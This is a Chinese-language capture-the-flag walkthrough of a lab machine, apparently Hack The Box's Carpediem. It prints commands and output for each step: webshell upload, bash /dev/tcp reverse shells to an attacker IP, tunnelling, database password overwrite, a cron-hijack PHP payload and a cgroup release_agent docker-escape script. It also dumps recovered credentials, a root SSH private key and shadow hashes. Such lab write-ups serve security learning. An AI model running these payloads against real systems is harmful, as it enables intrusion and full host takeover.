基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.167
Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-27 13:12 CST
Nmap scan report for 10.10.11.167
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 962176f72dc5f04ee0a8dfb4d95e4526 (RSA)
| 256 b16de3fada10b97b9e57535c5bb76006 (ECDSA)
|_ 256 6a1696d80529d590bf6b2a0932dc364f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Comming Soon
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.62 seconds

80

comming soon,得到的域名加hosts:

1
10.10.11.167 carpediem.htb

子域名扫描

常规字典扫描子域名,发现porpal:

1
2
3
gobuster vhost -u http://carpediem.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

Found: portal.carpediem.htb (Status: 200) [Size: 31090]

加hosts:

1
10.10.11.167 carpediem.htb portal.carpediem.htb

portal.carpediem.htb

在线摩托商城:

目录扫描

目录扫描,在portal下发现admin:

1
2
3
4
5
6
7
8
9
10
11
12
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://portal.carpediem.htb

/admin (Status: 301) [Size: 328] [--> http://portal.carpediem.htb/admin/]
/assets (Status: 301) [Size: 329] [--> http://portal.carpediem.htb/assets/]
/build (Status: 301) [Size: 328] [--> http://portal.carpediem.htb/build/]
/classes (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/classes/]
/dist (Status: 301) [Size: 327] [--> http://portal.carpediem.htb/dist/]
/inc (Status: 301) [Size: 326] [--> http://portal.carpediem.htb/inc/]
/index.php (Status: 200) [Size: 31090]
/libs (Status: 301) [Size: 327] [--> http://portal.carpediem.htb/libs/]
/plugins (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/plugins/]
/uploads (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/uploads/]

portal.carpediem.htb

任意注册登录,更新资料的请求中发现login_type参数:

尝试将其修改为1,我们是管理员,可以访问admin界面:

webshell

上传季度报告处,网页上显示上传功能还在开发,但可以得到upload接口直接调用,从而上传webshell:

reverse shell

一个容器内的www-data:

1
bash -c 'exec bash -i &>/dev/tcp/10.10.14.19/4444 <&1'

docker网段扫描

这部分考试网络问题比较差,参考wp云了

探测docker网段,发现其他容器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Nmap scan report for 172.17.0.1
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap scan report for 172.17.0.2
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
443/tcp open https

Nmap scan report for 172.17.0.3
PORT STATE SERVICE
27017/tcp open unknown

Nmap scan report for 172.17.0.4
PORT STATE SERVICE
3306/tcp open mysql
33060/tcp open unknown

Nmap scan report for 172.17.0.5
PORT STATE SERVICE
8118/tcp open unknown

mongosh

27017和8118,转到本地访问:

1
2
3
4
5
# local
chisel server --reverse --port 8000

# target
www-data@3c371615b7aa:/dev/shm$ ./chisel client 10.10.14.19:8000 R:8118:172.17.0.5:8118 R:27017:172.17.0.3:27017 &

访问本地8000端口,发现是Trudesk,账号密码在mongo中,破解不出来,密码是bcrypt,生成一个后直接修改数据库:

1
2
3
4
5
6
❯ python3 password.py
$2b$10$zX4LTPwe7bEjhvQ.lbNgNuttsUcvcstL6SHHhZhIXouFObHXxYqey

mongosh mongodb://127.0.0.1:27017
test> use trudesk
trudesk> db.accounts.update( {"_id": ObjectId("623c8b20855cc5001a8ba13c")}, {$set: {"password": "$2b$10$zX4LTPwe7bEjhvQ.lbNgNuttsUcvcstL6SHHhZhIXouFObHXxYqey"}});

然后使用修改的密码登录Trudesk,其中一张ticket中得到zoiper相关信息

zoiper

我们知道域是 carpediem.htb,它告诉我们 9560 是用户

密码告诉我们现在是 2022 并且通过拨打 *62 我们可以收听凭据

我们从我们获得的数据开始,拨号时我们听凭据

获得的凭据是 hflaccus : AuRj4pxq9qPk 我们可以通过 ssh 连接

bcrypt.py

1
2
3
4
5
6
7
import bcrypt

password = "password"
salt = bcrypt.gensalt(rounds=10)
encoded = bcrypt.hashpw(password.encode(),salt)

print(encoded)

user flag

使用前面得到的hflaccus账户ssh连接,得到user flag:

backdrop

继续云,hflaccus用户tcpdump抓到一些https流量, 使用对应私钥解密,得到jpardella账号密码:

1
2
3
4
5
6
7
tcpdump -i any port 443 -w captura

file /etc/ssl/certs/backdrop.carpediem.htb.key
/etc/ssl/certs/backdrop.carpediem.htb.key: PEM RSA private key

jpardella
tGPN6AmJDZwYWdhY

8002 Backdrop

这个账号密码可以登录8002端口的Backdrop:

1
sshpass -p AuRj4pxq9qPk ssh hflaccus@10.10.11.167 -L 8002:127.0.0.1:8002

利用对应漏洞,导入恶意模块,访问执行,得到Backdrop容器shell

信息

寻找有趣的文件,我们可以在 /opt 中看到一个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@90c7f522b842:/opt$ cat heartbeat.sh
#!/bin/bash
#Run a site availability check every 10 seconds via cron
checksum=($(/usr/bin/md5sum /var/www/html/backdrop/core/scripts/backdrop.sh))
if [[ $checksum != "70a121c0202a33567101e2330c069b34" ]]; then
exit
fi
status=$(php /var/www/html/backdrop/core/scripts/backdrop.sh --root /var/www/html/backdrop https://localhost)
grep "Welcome to backdrop.carpediem.htb!" "$status"
if [[ "$?" != 0 ]]; then
#something went wrong. restoring from backup.
cp /root/index.php /var/www/html/backdrop/index.php
fi
www-data@90c7f522b842:/opt$

每隔一段时间,它就会更改 index.php 文件并调用它或类似的东西

所以我们直接修改对应php文件,等待触发执行,得到容器root:

1
2
3
4
5
❯ cat index.php
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.10/443 0>&1'");?>

www-data@90c7f522b842:~/html/backdrop$ rm -f index.php
www-data@90c7f522b842:~/html/backdrop$ wget http://10.10.14.10/index.php

docker逃逸 & root flag

之后就是逃逸,得到外部宿主机root:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
❯ cat script.sh
mkdir /dev/shm/privesc
mount -t cgroup -o rdma cgroup /dev/shm/privesc
mkdir /dev/shm/privesc/x
echo 1 > /dev/shm/privesc/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /dev/shm/privesc/release_agent
echo '#!/bin/bash' > /cmd
echo "bash -c 'bash -i >& /dev/tcp/10.10.14.10/443 0>&1'" >> /cmd
chmod a+x /cmd
bash -c "echo \$\$ > /dev/shm/privesc/x/cgroup.procs"

root@90c7f522b842:~# unshare -UrmC bash
root@90c7f522b842:~# wget http://10.10.14.10/script.sh &>/dev/null
root@90c7f522b842:~# chmod +x script.sh
root@90c7f522b842:~# ./script.sh
root@90c7f522b842:~#

root_id_rsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

shadow

1
2
root:$6$y5QrvfE3csMMok1t$DvYGED3VsftC3ylIHA8yGVg2j2KiP7uooPn309LahXXPEZulnVWBwwKLorPdiW5snCgWEYN6F24b8LQALG1CD1:19081:0:99999:7:::
hflaccus:$6$Y3pKa50HWcGkr/KE$ZBG57pq5RIwDs9l75xJMz5Cv2SweVTFOcsv3WzRLC9c/QRX7wSgNT/XekUYExD30WTZiCHYhLg25mSTRgoZlT.:19083:0:99999:7:::

参考资料